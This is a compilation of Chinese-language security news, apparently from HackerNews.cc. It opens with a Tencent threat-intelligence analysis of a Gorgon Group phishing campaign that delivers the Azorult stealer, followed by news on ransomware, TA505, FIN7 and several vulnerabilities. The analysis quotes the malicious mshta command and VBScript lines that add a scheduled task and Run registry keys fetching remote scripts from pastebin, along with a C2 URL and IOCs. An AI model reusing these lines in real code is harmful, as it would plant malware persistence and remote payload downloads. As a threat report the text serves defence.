收到“订单、付款收据、分析报告”PPT,请勿打开,为Gorgon Group黑客组织投递的攻击邮件

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Td6zdGxeOjKEh3nu-vAGdw 一、背景 近期腾讯安全威胁情报中心检测到多个企业受到以PPT文档为诱饵文档的钓鱼邮件攻击。这些钓鱼邮件投递的PPT文档包均含恶意宏代码,宏代码会启动mshta执行保存在pastebin上的远程脚本代码,且pastebin URL是由Bitly生成的短链接。 此次攻击的主要特点为恶意代码保存在托管平台pastebin上:包括VBS脚本、Base64编码的Powershell脚本以及经过混淆的二进制数据。攻击者在后续阶段会通过计划任务下载RAT木马,然后将其注入指定进程执行,RAT会不定期更换,当前获取的RAT 木马是Azorult窃密木马。 对比分析发现,攻击者注册的pastebin账号为”lunlayloo”( 创建于2019年10月),与另一个账号“hagga”(创建于2018年12月)对应攻击事件中使用的TTP高度相似,因此我们认为两者属于同一家族ManaBotnet,并且”lunlayloo”可能为“hagga”的后继者。 有安全厂商分析认为Pastebin账号“hagga”发起的攻击活动有可能来自组织Gorgon Group,一个疑似来自巴基斯坦或与巴基斯坦有关联的黑客组织。该组织已进行了一系列非法行动和针对性攻击,包括针对英国、西班牙、俄罗斯和美国的政府组织的攻击。 Manabotnet攻击流程 二、详细分析 初始攻击以PPT文档为诱饵,使用的文件名有“SHN FOODS ORDER.ppt”、“PrivateConfidential.ppt”、“Analysis Reports.ppt”、“Order001.ppt”、“payment_receipt.ppt”,邮件主题为Analysis Reports From IDS Group(来自IDS Group的分析报告 )、Analysis Reports From NHL – Nam Hoang Long Co.,Ltd(来自NHL公司的分析报告)、Purchase Order2020(2020采购订单)、payment_receipt.ppt(付款收据)等。 Analysis Reports.ppt中包含恶意的VBA宏代码。 如果用户选择启用宏,则会执行命令: `mshta https[:]//j.mp/ghostis61hazsba` 远程代码URL是短链接,还原为https[:]//pastebin.com/raw/FssQ8e8e,恶意代码被保存在托管平台pastebin.com。 以同样方式投递的文档SHN FOODS ORDER.ppt中的宏执行的恶意代码为,https[:]//j.mp/ghjbnzmxc767zxg,短链接还原得到https[:]//pastebin.com/raw/RCd2CLNd,该地址的托管恶意代码页面如下: 通过浏览器的调试功能对该代码进行编码转换可得到VBScript代码: 该代码加入了一些字符反转和字符连接操作,以逃避恶意代码检测,然后执行5个操作进行持久化: 1.创建计划任务“Murtaba”,每80分钟运行一次远程hta脚本; 2.执行一次hta脚本; 3.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2下写入执行hta脚本的命令; 4.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3下写入执行hta脚本的命令; 5.在注册表HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\中写入执行hta脚本的命令。 `CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn ““Murtaba”” /tr ““\”“&` `CreateObject(“WScript.Shell”).Run “””mshta”””“http:\\pastebin.com\raw\B7f3BpDk”“”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup2”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\eMse7spS”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\BACKup3”, “””m” + “s” + “h” + “t” + “a”””“http:\\pastebin.com\raw\hxKddkar”“”, “REG_SZ”` `CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\”, ““”m” + “s” + “h” + “t” + “a“”””http:\\pastebin.com\raw\v2US1QAY”””, “REG_SZ”` 在计划任务中指定执行的远程hta脚本均https[:]\\pastebin.com\raw\B7f3BpDk,解码为以下文本,同样是一段VBScript代码,在其中以隐藏的方式执行Powershell,首先通过ping google.com测试网络是否连通,然后下载Powershell脚本https[:]//pastebin.com/raw/8ZebE1MG进行base64解码并执行。 计划任务执行的Pastebin保存的VBScript脚本: VBScript通过Powershell执行Pastebin保存的以base64编码的Powershell脚本: Base64解码后: Powershell代码将一个压缩包文件的二进制数据以硬编码形式进行保存,使用时首先将“!”替换为“0x”去除混淆,然后通过IO.MemoryStream将数据读取到内存,最后再使用IO.Compression.GzipStream进行解压,就可以获得一个以.Net编写的DLL并通过Reflection  加载执行: $t=[System.Reflection.Assembly]::Load($decompressedByteArray); Powershell获取的另一个PE直接保存了二进制编码在pastebin的URL(https://pastebin.com/raw/f9c50ewQ)上,使用时首先将‘T_B’替换为‘0x’,在分析过程中发URL被动态更换为了:https://pastebin.com/raw/EmyvkN6m,使用时将“^^_^^”替换为“0x”,还原得到PE文件后,将其注入到notepad.exe的内存中执行: [Givara]::FreeDom(‘notepad.exe’,$Cli2)  https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m .NET编写的DLL名为Apple.dll,入口调用Fuck.FUN,Fuck.FUN随后启动记事本,掏空现有部分的映射,在记事本进程中分配一个新的缓冲区,向该进程中写入有效负载,然后继续执行线程。这样使得攻击者无需将恶意软件写入磁盘,通过计划任务可定期获取注射器(一段攻击代码,用来将RAT注入其他程序)和RAT,并将RAT注入指定进程的内存中执行。 当前作为Payload被下载执行的是Azorult木马,一种使用Delphi编写的窃密木马变种。Azorult已在俄罗斯论坛上出售,价格最高为100美元。 Azorult窃密木马的大多数功能是获取可以在受害者计算机上找到的各类账号密码,例如,电子邮件帐户,通信软件(例如pidgin、 psi+,、telegram),Web Cookie,浏览器历史记录和加密货币钱包,同时该木马还具有上载和下载文件以及截屏的功能。 三、团伙分析 攻击者使用第三方网站(例如Bitly,Blogspot和Pastebin)可能是为了逃避检测,因为这些网站不会被网络防御方判断为恶意网站。但是,诸如Bitly和Pastebin之类的网站会记录访问某个链接的次数。我们能够确定是谁创建了此Pastebin帖子,并统计该链接被访问了多少次。 例如,从页面可以看到托管“Apple.dll”样本的URL已被查看12000多次。这表明有12000台计算机受此攻击影响。但是,由于攻击者使用的是已知的RAT木马,因此实际受影响的计算机数量可能会少得多,因为许多计算机可能已安装了杀毒软件。 “lunlayloo”在2020年3月30日上传的恶意代码,该账户创建于2019年10月23日。 lunlayloo在2020年4月21日上传的恶意代码,托管“Azorult Rat”,由于最近才更新,被查看只有77次。 分析时发现攻击Azorult Rat回传数据对应的URL为: http[:]//23.247.102.120/manabotnet-work/index.php 该URL中包含的“manabotnet”与另一安全公司发现的Pastebin帖子标题:“ MasterManabots-all-bots”相同,该攻击者的Pastebin账号名称为“hagga”,于2018年12月3日创建,另外由于两次攻击使用的TTP高度相似性,所以我们认为他们属于同一家族ManaBots。   unit42在2019年4月对Pastebin账号“HAGGA”发起的攻击活动进行了详细的分析,基于高水平的TTP,包括使用RevengeRAT,unit42认为其与Gorgon Group组织有关。 (https[:]//unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/) 2019年1月腾讯安全御见威胁情报中心也捕获到疑似来自Gorgon Group组织相关的攻击,)(https[:]//www.freebuf.com/column/193603.html),该攻击以“订单”、“支付详单”等主题的钓鱼邮件针对全球的外贸人士进行攻击,行为类似于腾讯安全威胁情报中心多次披露的”商贸信”,攻击者使用blogspot的订阅功能来保存恶意代码。 综合分析以上几次攻击行动,总结该团伙攻击对应的ATT&CK矩阵对应如下,共涉及约44个TTP技术: Initial Access(初始攻击) T1193 Spearphishing Attachment Execution(执行) T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1064 Scripting T1127 Trusted Developer Utilities Persistence(持久化) T1060 Registry Run Keys / Startup Folder T1053 Scheduled Task Privilege Escalation(权限提升) T1055 Process Injection T1053 Scheduled Task Defense Evasion(防御逃逸) T1140 Deobfuscate/Decode Files or Information T1143 Hidden Window T1170 Mshta T1027 Obfuscated Files or Information T1093 Process Hollowing T1055 Process Injection T1064 Scripting T1127 Trusted Developer Utilities T1102 Web Service Credential Access(凭证获取) T1503 Credentials from Web Browsers T1081 Credentials in Files T1214 Credentials in Registry T1539 Steal Web Session Cookie Discovery(数据发现) T1083 File and Directory Discovery T1012 Query Registry T1518 Software Discovery T1082 System Information Discovery T1007 System Service Discovery Collection(数据采集) T1123 Audio Capture T1119 Automated Collection T1115 Clipboard Data T1213 Data from Information Repositories T1005 Data from Local System T1039 Data from Network Shared Drive T1074 Data Staged T1056 Input Capture T1185 Man in the Browser T1113 Screen Capture T1125 Video Capture Command and Control(命令和控制) T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1132 Data Encoding T1001 Data Obfuscation T1219 Remote Access Tools T1105 Remote File Copy T1102 Web Service Exfiltration(数据窃取) T1022 Data Encrypted T1041 Exfiltration Over Command and Control Channel 其中具有该团伙的代表性的TTP技术点为: T1170 Mshta T1086 PowerShell T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder T1093 Process Hollowing T1055 Process Injection T1102 Web Service 在T1102 Web Service技术上,该团伙经常使用的合法外部Web服务为Bitly、Blogspot和Pastebin,这个技术在ATT&CK矩阵中战术条目中同时属于Defense Evasion(防御逃逸)和Command and Control(命令和控制),在具体攻击过程中体现在可以绕过恶意网址检测,以及可以通过修改托管网站上的URL对应的内容动态控制下载的恶意代码。 四、安全建议 Gorgon Group为专业黑客组织,擅长攻击大型企业、行业及政府背景的机构,腾讯安全威胁情报中心推荐相关单位采用腾讯安全完整解决方案提升系统安全性,防止专业黑客的攻击。 IOCs Md5 417eef85b7545b13cb2a5b09508a9b8a cd425ac433c6fa5b79eecbdd385740ab f4479c5553271402ab4ff9a55584a9fd URL http://23.247.102.120/manabotnet-work/index.php 短链接: https[:]//j.mp/ghjbnzmxc767zxg https[:]//j.mp/hdjas6782vnavx https[:]//j.mp/dhajsk67a8sdg https[:]//j.mp/ahjkads78dasa https[:]//j.mp/hdajks6786sa https[:]//j.mp/dbashgdyt23vb Pastebin https[:]//pastebin.com/raw/8ZebE1MG https[:]//pastebin.com/raw/FssQ8e8e https[:]//pastebin.com/raw/RCd2CLNd https[:]//pastebin.com/raw/f9c50ewQ https[:]//pastebin.com/raw/EmyvkN6m https[:]//pastebin.com/raw/B7f3BpDk https[:]//pastebin.com/raw/eMse7spS https[:]//pastebin.com/raw/hxKddkar https[:]//pastebin.com/raw/v2US1QAY 参考链接 https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ https://www.freebuf.com/column/193603.html

Word Press 插件存在漏洞 黑客可获得管理员权限

Word Press插件Theme Grill Demo Importer的漏洞被修复,影响将近20万个网站,该插件可以利用漏洞清除网站数据库并获得管理员权限。管理员可对演示内容等进行内部设置。 网络安全公司Web ARX研究人员近期发现:该插件的1.3.4到1.6.1版本受一个关键漏洞影响,漏洞可允许未经身份验证的攻击者擦除Word Press网站的整个数据库,而该公司研究人员发现该漏洞已经存在三年。 据了解,该插件存在的漏洞会导致数据库进行默认设置和数据填充,如果数据库中包含名为“admin”的用户,攻击者则利用漏洞会以管理员身份自动登录。 此外,Web ARX的首席执行官Oliver Sild 表示:并非所有安装了Theme Grill Demo Importer的Word Press网站都容易受到攻击,若想要利用该漏洞,必须安装使用插件。他们公司会提供漏洞检测和虚拟补丁软件,以保护网站免受第三方组件漏洞的攻击,也可利用Theme Grill漏洞实现自动化。 该漏洞已于2月6日报告给Theme Grill开发人员,并于2月16日通过1.6.2版进行了修补。   消息来源:securityweek, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

美国拉辛市遭勒索软件攻击 多行业网络受影响

1月31日,美国威斯康星州的拉辛市被勒索软件入侵,事件发生后,该市大部分计算机系统瘫痪。 该地政府科技网站发布报告称:本市的计算机网络系统周五被勒索软件入侵,至周日下午网络系统仍处于瘫痪状态。目前,该市的网站、电子邮件以及在线支付系统都收到影响。拉辛警方发布Facebook,称其目前无法支付事件的处理费用,也无法提供事件的侦测报告。 周五,该市的信息管理部门开启了事件响应程序,地方当局以及联邦政府对事件展开调查,调查声称税收以及911公共安全系统未受这次勒索软件入侵影响。 鲍威尔在一份声明中称:MIS worked over the weekend 公司联合网络安全公司制作了一个周密的计划,在不传播勒索软件的情况下恢复网络系统,目前对事件发生原因以及波及范围都在进行调查。 去年12月,Maze勒索软件运营商发布消息,称其利用勒索软件盗取彭萨科拉市的2GB文件。 去年11月,路易斯安那周政府遭到勒索软件攻击,多州的服务机构包括机动车管理局、卫生部以及运输发展部都受到影响。这一事件使得路易斯安那州关闭了该州的几个网站以及邮件和互联网服务。 8月份,近23个地方政府遭受勒索软件攻击,佛罗里达州的一些城市也受到黑客影响。去年6月,佛罗里达州被勒索软件攻击系统,里维埃拉海滩城同意支付60万美元的赎金来解密其数据。几天后,莱克城也同意支付近50万美元的赎金机密遭勒索软件攻击系统。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

微软警告 TA505组织正在改变网络攻击策略

微软安全专家发现TA505网络犯罪团伙正在发起网络钓鱼活动,使用带有HTML重定向器附件发送恶意Excel文档。据悉,这是TA505团伙首次采用这种策略。 TA505黑客团伙自2014年以来一直活跃于零售和银行业。该团伙以一些规避技术而闻名,随着时间推移这些技术被用于安全规避控制,主要是通过几种恶意软件渗透到公司内部,如滥用所谓的LOLBins,使得受害者在合法情况下滥用程序。此外,TA505集团还与Locky、BitPaymer、费城、globeimparter和Jaff勒索软件家族一起参加了旨在分发Dridex banking特洛伊木马的活动。 网络安全公司Eversion的安全专家发表报告称:TA505已经危害了1000多个组织。 “我们在对这场运动的分析过程中,我们能确定至少一家总部位于美国的电气公司、一家美国州政府网络以及世界上最大的25家显示出妥协迹象的银行都包含其中。” 目前,微软通过发布推特证实这项网络钓鱼活动。 “这是第一次使用HTML重定向器观察Dudear ,其中,攻击者还使用不同语言的HTML文件。值得注意的是,他们还使用IP回溯服务来跟踪下载恶意Excel文件的固定IP地址。” 此外,微软专家还透露,攻击者正在使用电子邮件上附带的的HTML定向程序。一旦受害者打开邮件,HTML就会定向下载一个恶意的Excel文件,而该文件最终将丢弃有效载荷,攻击者可以使用IP回溯服务跟踪下载恶意Excel文件的计算机的IP地址。这是TA505第一次使用这种技术,过去,该组织使用携带恶意软件的垃圾邮件或者使用恶意的url来作为附件,在受害者被诱骗打开Excel文档后,不可以使用在线预览,但可进行文档编辑。 目前有好消息称:微软安全情报部门已经确认微软威胁防护系统能够中和攻击,office 365能够检测此活动中使用的恶意附件和URL,microsoft defender atp也能够检测TA 505使用的恶意html、excel文件和有效负载。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

NSA 发现 Win10 漏洞 影响全球数十亿用户

继Adobe 星期二发布2020年第一个补丁程序软件更新后,微软也发布了一月份安全公告,警告数十亿用户有49个漏洞需要更新。周二发布的补丁程序的特别之处在于它更新修复了一个由美国国家安全局(NSA)发现的被广泛应用于windows10、Server 2016和2019版本中的一个核心组件。 CVE-2020-0601: Windows CryptoAPI欺诈漏洞 根据微软发布的官方公告:这个被称为“’NSACrypt”并定义为CVE-2020-0601的漏洞存在于Crypt32.dll模块中,该模块被包含在windows API系统,会对数据进行加密以及对各种“通行证和加密信息传递”进行解密处理。 但问题在于Crypt32.dll模块主要采用椭圆曲线加密(ECC)方式(该加密形式主要在SSL/TLS证书中使用),而椭圆曲线加密是目前公钥加密行业的标准。NSA在发布的新闻稿中对此现象解释到:攻击者通过通行证会破坏windows的加密验证方式,实现远程代码的执行。 攻击者通过滥用漏洞会破坏的验证方式有: HTTPS连接 签名文件和电子邮件 用户模式进下启动可执行签名代码 尽管该漏洞的技术细节尚未公开,但微软证实:若攻击者成功利用漏洞,会在用户不知情的情况下仿冒用户数字签名,进行恶意软件程序安装,也可以仿冒用户安装任何合法软件。此外,CryptoAPI中的漏洞还可能使远程攻击者更容易冒充网站或对受影响软件上的信息进行解密。 国家安全局表示:“此漏洞是我们与安全社区研究合作的一个例子,为确保用户安全,在此之前一个漏洞已被私下披露进行发布更新,若我们不对漏洞进行修复,其后果会很严重。 除了威胁等级被评为“重要”的Windows CryptoAPI欺诈漏洞之外,微软还修补了48个其他漏洞,其中8个是核心漏洞,其余40个都是重要漏洞。目前对于此种漏洞没有彻底的解决办法,建议用户可通过点击“窗口设置→更新和安全→窗口更新→单击“检查电脑上的更新”来安装最新的软件更新。 Windows系统中的其他重要的RCE漏洞 其中两个是会影响windows远程网关的CVE-2020-0609和CVE-2020-0610,未经身份验证的攻击者可以利用这些网关通过RDP请求在目标系统上执行恶意代码。 “此漏洞采用的是身份预先认证,不需要用户进行交互认证。成功利用此漏洞,攻击者可以在目标系统上执行任意代码,”windows顾问说。而CVE-2020-0611远程桌面客户端中的一个关键问题是它可能会导致反向RDP攻击,恶意服务器可以在连接客户端的计算机上执行任意代码。 “要利用这一漏洞,攻击者需要控制服务器,然后说服用户连接到它,而攻击者还可能危及合法服务器,在其上托管恶意代码,并等待用户连接”微软顾问说到。 幸运的是,微软本月修复的漏洞并未发现被公开披露或任意利用。   消息来源:thehackernews, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Cisco Webex 漏洞允许远程执行代码

上周三,Cisco Systems 发布了14个产品漏洞修补程序,其中包括12个中危漏洞和2个高危漏洞。日前,已修复了2个高危漏洞,其中一个漏洞位于Webex视频会议平台,它在内部网络安全测试中被发现,对Cisco Webex Video Mesh软件在2019.09.19.1956m(固定版本)之前的版本都会产生影响。 该漏洞存在于Cisco Webex Video Mesh的基于Web的管理界面中,该功能可用于视频会议的本地基础结构来增强音频、视频和内容,并在此基础上进行远程攻击。Cisco本周发布安全公告称:成功利用此漏洞可使攻击者在目标节点上以根用户权限对潜存的Linux操作系统执行任意命令。 尽管攻击者可远程利用这些漏洞,但他们需要通过身份验证,这意味着攻击者首先需要通过管理权限登录web管理界面,然后再向应用程序提交请求,但在一般情况下Webex平台对这些请求并不会直接通过。 此外,这家网络巨头还发布了针对Cisco IOS和Cisco IOS XE软件web用户界面中另一个严重故障的修复程序。IOS XE是基于Linux Cisco 网络操作系统(IOS)的一个版本,是Cisco 路由器和交换机的驱动软件。IOS XE支持的产品包括企业交换机(包括Cisco的Catalyst系列)、分支路由器和边缘路由器(包括ASR 1013)。 实验发现,此漏洞可使未经身份验证的远程攻击者在受影响的系统上发起跨站点伪造(CSRF)请求攻击。CSRF攻击者通过使用社交软件发起电子邮件,诱使受害者点击链接,然后将伪造的请求发送到服务器。 Cisco称该漏洞产生原因在于:受影响设备的web用户界面CSRF保护不足,而攻击者可以通过对用户进行恶意跟踪来利用该漏洞。成功利用此漏洞可使攻击者对目标用户的权限进行任意操作,如果用户本身具有管理权限,攻击者还可以更改配置、对命令进行重新加载执行。 据了解,该漏洞由MehmetÖnder Key发现,Cisco IOS或Cisco IOS XE软件16.1.1之前启用了HTTP服务器功能的版本会产生影响。目前还没有发现任何针对该漏洞的解决办法,此漏洞在CVSS上被评分8.8分(满分10分)。   消息来源:threatpost, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Sodinokibi 勒索软件首次发布被盗数据

由于未及时支付赎金,Sodinokibi勒索软件背后的攻击者首次发布了从一名受害者那里窃取的文件。自上个月以来,Sodinokibi(也称为REvil)公开表示,他们将开始效仿Maze,如果受害者不支付赎金,就公开从受害者那里窃取的数据。他们在俄罗斯黑客和恶意软件论坛上首次发布了大约337MB所谓的被盗受害者文件的链接。 攻击者称:这些数据属于Artech信息系统公司(该公司被称为是少数民族和女性员工最多的公司,同时也是美国较大的IT公司之一),如果该公司不支付赎金,他们将发布更多的数据。 “这些数据只是我们所拥有数据一小部分。如果还不采取任何行动,我们将向第三方出售剩余的更重要以及更有趣的数据,而这些数据中还包含财务细节。” 目前,Artech网站因不明原因已全线关闭,Bleeping Computer 向Artech方求证相关问题,也并未得到回复。 正如我们反复提及的,对勒索软件攻击造成的数据泄露事件应该以透明方式来解决,若试图采取隐藏方式,公司员工、客户数据不仅会被暴露,还可能有罚款和被诉讼的危险。而这种利用被盗数据作为砝码的行为不仅不会解决事情,还会使事情变得更糟。   消息来源:bleepingcomputer, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

黑客谎称微软遭受伊朗网络攻击进行邮件钓鱼

黑客正试图利用伊朗最近可能发动网络攻击的警告,来搜集Microsoft登录凭据进行网络欺诈。由于美国和伊朗之间关系日渐紧张,美国政府就伊朗可能会对重要基础设施发起网络攻击发出警告。在这样的局势下,一名攻击者谎称自己源于“Microsoft MSA”并发送了主题为“电子邮件用户受到伊朗网络攻击”的邮件,谎称微软服务器受到了来自伊朗的网络攻击来进行网络欺诈。 仿冒邮件还写到:为了应对这一攻击,微软会将邮件和数据锁定在服务器上以此保护用户免受伤害,若想要再次获得锁定用户的数据访问权,用户需要重新登录。 关于进行网络欺诈的电子邮件 据收到该钓鱼邮件的用户Michael Gillett说:他发现该邮件能够绕过Outlook的垃圾邮件过滤器,到达收件人的邮箱中。 以下是邮件内容 Cyber Attack 我们的服务器今天遭到伊朗政府的网络攻击,为了确保您的网络安全,我们不得不采取额外措施来保护您的帐户和个人数据。 一些电子邮件和文件可能会被锁定,为了您的账户安全,您需要再次登录账户。如果您在接收电子邮件时仍有问题,请耐心等待,我们的技术支持团队正在加紧处理,会尽快恢复数据。 Restore Data 如果收件人点击“还原数据”按钮,则会返回到仿冒的Microsoft登录页面,但从URL可以看到,这并不是一个合法的Microsoft站点。 伪造的Microsoft登录页面 如果用户输入登录凭证,用户信息将会被攻击者盗取被进行其他方面的网络攻击,而这些攻击可能包括:有针对性的网络欺诈、凭证填充攻击,数据盗窃。 因此,在这里提醒用户:当收到奇怪电子邮件,要求登录账户执行某项操作时,需要保持警惕,有问题可以联系网络或邮件账户管理员。此外,用户还要注意检查包含Microsoft登录表单在内的任何登录页面的URL,而合法的登录表单会在Microsoft.com、live.com和outlook.com域上进行公布。   消息来源:bleepingcomputer, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

VPN 警告:REvil 勒索软件盯上未打补丁的 Pulse Secure VPN 服务器

使用REvil(Sodinokibi)勒索软件勒索大型组织的网络罪犯瞄准未打补丁的Pulse Secure VPN服务器,并禁用防病毒软件。 安全研究人员正在敦促使用Pulse Secure VPN的组织立即进行修补,否则将面临犯罪分子的“大规模”勒索软件攻击,这些犯罪分子可以轻松地使用Shodan.io IoT搜索引擎来识别易受攻击的VPN服务器。 上个月,在纳斯达克上市的美国数据中心提供商CyrusOne遭到REvil(Sodinokibi)勒索软件攻击,而去年夏天,美国的几个网络服务商、德克萨斯州的20多个地方政府机构以及400多个牙医诊所也相继遭到了网络攻击。 由于犯罪分子利用该勒索软件来加密关键业务系统,并要求巨额赎金解密,英国安全研究员凯文·博蒙特将REvil归为“big game”类别,该勒索软件病毒株于去年4月被发现,主要是使用Oracle WebLogic中的漏洞来感染系统。 去年10月,美国CISA、美国国家安全局联合英国国家网络安全中心发布的警告称:REvil瞄准的Pulse secure VPN服务器还未打补丁。此前有证据显示,政府支持的黑客正在利用Pulse Secure 以及Fortinet VPN产品中的漏洞,由于该漏洞已被网络犯罪分子广泛使用,因而波及范围也越来越广。 凯文·博蒙特指出:由于该服务器允许远程攻击者在没有有效凭据的情况下连接公司网络,同时禁用多种形式的身份验证,在这样的情况下以纯文本的形式远程查看包括活动目录和账户密码在内的日志和缓存密码,导致Pulse Secure VPN 漏洞情况越来越糟糕。上周发生的两起漏洞事件都采用了类似的手段:通过访问网络来获取域管理控制,然后使用开源VNC远程访问软件来访问移动网络。 在这样的流程后,所有安全端口都会被禁用,REvil(Sodinokibi)勒索软件会通过PsExec渗透到Windows远程管理系统中。网络安全公司Bad Packets 1月4日扫描数据显示:仍有3825台Pulse secure VPN服务器漏洞还未被修补,其中去年10月警报中所提到的CVE-2019-11510漏洞就包含其中,而1300多个易受攻击的漏洞VPN服务器均位于美国。   消息来源:zdnet, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

新发现!FIN7 的新型装载程序应用在 Carbanak 后门

专家们发现了一种被FIN7网络犯罪集团称为BIOLOAD的新型加载程序,该程序被用在Carbanak 后门作为新变化的释放器。 Fortinet EnSilo的研究人员发现,被称为BIOLOAD的新型的装载程序与FIN7黑客组织有关联。 Fin7黑客组织自2015年末开始活跃,活动目标是窃取全球范围内的企业支付卡信息,目前疑似已经袭击了100多家美国公司,袭击领域主要集中在其在餐饮、酒店和工业等行业。2018年8月,臭名昭著的FIN7网络犯罪集团三名犯罪人员被起诉,并受到网络欺诈、黑客入侵、盗取身份密码等行为的指控。 此外,BIOLOAD加载程序与BOOSTWRITE加载程序还存在极大的关联。 从相似角度看,BOOSTWRITE也是一个与FIN7组织相关联的加载程序,它也能够将恶意软件直接放入内存,但BIOLOAD通过二进制植入技术,采用dll的劫持方法,将恶意代码加载到合法程序中。 在研究过程中,Fortinet EnSilo的研究人员在FaceFodUninstaller.exe二进制文件中发现了一个恶意的动态链接库,这个链接库从windows 10 1803中开始清理安装Windows OS.此外,研究人员还发现黑客们在DLL“Winbio”所在的“\ System32 \ WinBioPlugIns”文件夹中被植入了恶意的WinBio.dll。 从不同角度看,BIOLOAD装载机样本于分别2019年3月和7月进行了编制,而BOOSTWRITE样本于5月编制。在加载器上,BIOLOAD不支持多个有效载荷,而使用XOR来解密有效载荷,并不是ChaCha密码。在秘钥连接上,BIOLOAD从受害者的名字中获得解密密钥而不是连接远程服务器来获取解密密钥。 2019年1月至4月的时间戳显示,BIOLOAD加载器主要被用来进行程序攻击,并进行Carbank病毒传输。专家发现,这些新的Carbank 病毒样本在对受感染的机器运行上针对防病毒解决方案检查相比以往会更多。而根据针对恶意软件攻击观察的TTPs分析表明:BIOLOAD是由FIN7网络犯罪集团开发的,很可能是BOOSTWRITE的前身。 Fortinet因此得出结论:“这是第一起FaceFodUninstaller.exe被威胁行为者滥用的主体案件,Fin7拥有最新工具的共享代码库,以及同样的技术和后门,导致了因加载程序而引发网络犯罪。时间戳以及更简单的功能表明BIOLOAD是在BOOSTWRITE基础上的更新。” Fortinet建议:由于加载程序是专门为每台目标计算机构建的,需要管理权限才能部署,因此建议相关部门要注意收集有关目标网络的信息。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文